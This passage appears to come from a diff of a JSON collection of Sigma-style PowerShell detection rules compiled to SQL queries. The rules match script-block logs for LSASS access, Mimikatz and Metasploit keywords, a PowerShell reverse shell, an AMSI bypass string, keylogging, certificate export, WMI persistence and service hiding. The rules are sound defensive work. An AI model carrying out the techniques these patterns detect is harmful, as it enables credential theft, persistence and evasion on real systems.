"SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Powershell 
Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "author": "frack113", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1565" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "PowerShell 
Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "author": "frack113", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", "status": "test", - "description": "Powershell use PassThru option to start 
in background", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "status": "experimental", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of 
those commands, will be embedded within the protocol traffic between the client and server.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText 
LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Enable Windows Remote 
Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "author": "frack113", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Unknown" + "Legitimate certificate exports invoked by administrators or users (depends 
on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "title": "Powershell MsXml COM Object", + "id": "78aa1347-1517-4454-9982-b338d6df8343", "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113, MatilJ", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_msxml_com.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "App-V clients" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", 
@@ -6775,48 +6661,67 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%PSAsyncShell%' ESCAPE '\\')" + ], + "filename": "posh_ps_psasyncshell.yml" + }, + { + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { "title": "Malicious ShellIntel PowerShell Commandlets", 
@@ -6838,193 +6743,196 @@ "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "author": "frack113", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "status": "experimental", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1059.001", + "attack.t1106" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.collection", + "attack.t1114.001" ], "falsepositives": [ - "Legitimate administration scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Powershell MsXml COM Object", - "id": "78aa1347-1517-4454-9982-b338d6df8343", + "title": "Import PowerShell Modules From Suspicious 
